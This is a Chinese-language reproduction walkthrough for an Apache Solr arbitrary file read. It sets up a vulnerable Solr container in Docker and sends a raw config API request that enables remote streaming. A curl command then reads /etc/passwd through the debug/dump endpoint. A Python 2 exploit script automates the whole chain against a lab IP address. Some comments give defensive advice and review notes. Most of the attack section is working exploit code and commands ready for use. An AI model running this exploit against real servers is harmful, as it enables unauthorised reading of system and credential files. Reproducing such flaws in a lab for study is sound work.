Apache-Solr 任意文件读取漏洞复现
使用Docker
# Pull the image and start a detached container; Solr's 8983 is published
# as 8081 on the host. Note that -p without an address binds on every host
# interface; for a lab box bind to loopback (127.0.0.1:8081:8983) unless
# remote reachability is actually wanted.
docker pull solr
docker run --detach --publish 8081:8983 --name solr2 solr
然后进入容器
# Without copying the default config set into the new core's directory,
# creating the core fails later on. Run inside the container.
cd /opt/solr-8.7.0/server/solr/configsets/_default
mkdir /var/solr/data/new_core
cp -r conf /var/solr/data/new_core
# Stop the container and start it again (presumably from the host, not
# inside the container — the id is the author's own container; substitute
# yours).
docker stop a6d76241265f
docker start a6d76241265f
然后进行测试
首先获取core
http://192.168.1.79:8081/solr/admin/cores?indexInfo=false&wt=json
这里可以列出实例上的所有核心；我只用 new_core 作为测试。
POST /solr/new_core/config HTTP/1.1
Host: 192.168.1.79:8081
Content-Length: 80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/json
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
读取文件
# Once requestParsers.enableRemoteStreaming is on for the core (set via the
# config API request above), debug/dump echoes back the content stream it
# was told to fetch, here a local file:// URL. A host that returns no
# "streams" in the response is not affected. The defensive setting is to
# leave remote streaming off and keep the config API unreachable from
# untrusted networks.
curl "http://192.168.1.79:8081/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
exp:
#!/usr/bin/python
# coding: UTF-8
import requests
# Target base URL; a single trailing slash is dropped so the path fragments
# built below can be joined with a leading '/'.
host = "http://192.168.1.79:8081/"
if host.endswith('/'):
    host = host[:-1]
def get_core(host):
    """Check one Solr instance for the remote-streaming file read above.

    Lists cores through the admin API, takes the first one, turns on
    requestParsers.enableRemoteStreaming through the config API, then asks
    debug/dump to fetch a file:// stream.

    Args:
        host: base URL with no trailing slash (the caller strips it).
    Output: prints the returned stream contents; exits with a message when
        the response carries no stream. Network or JSON errors from
        requests propagate. Nothing is printed when the instance reports no
        cores (there is no else branch on that check).
    Python 2 only: uses the print statement and list-returning dict.keys().
    """
    url = host + '/solr/admin/cores?indexInfo=false&wt=json'
    core_data = requests.get(url, timeout=3).json()
    if core_data['status']:
        # Python 2: keys() is a list, so the first core is index 0. Under
        # Python 3 this raises TypeError (dict_keys is not subscriptable).
        core = core_data['status'].keys()[0]
        # NOTE(review): the value is the string 'true' here, while the raw
        # request earlier in the write-up sends a JSON boolean; whether the
        # server treats both the same is not shown — confirm before relying
        # on it.
        jsonp_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": 'true'}}
        requests.post(url=host + "/solr/%s/config" % core, json=jsonp_data)
        result_data = requests.post(url=host + '/solr/%s/debug/dump?param=ContentStreams' % core,
                                    data={"stream.url": "file:///etc/passwd"}).json()
        if result_data['streams']:
            print result_data['streams'][0]['stream']
        else:
            # Message (Chinese): "this vulnerability is not present".
            exit("不存在此漏洞")
# Entry point: run the check against the host configured above.
get_core(host)





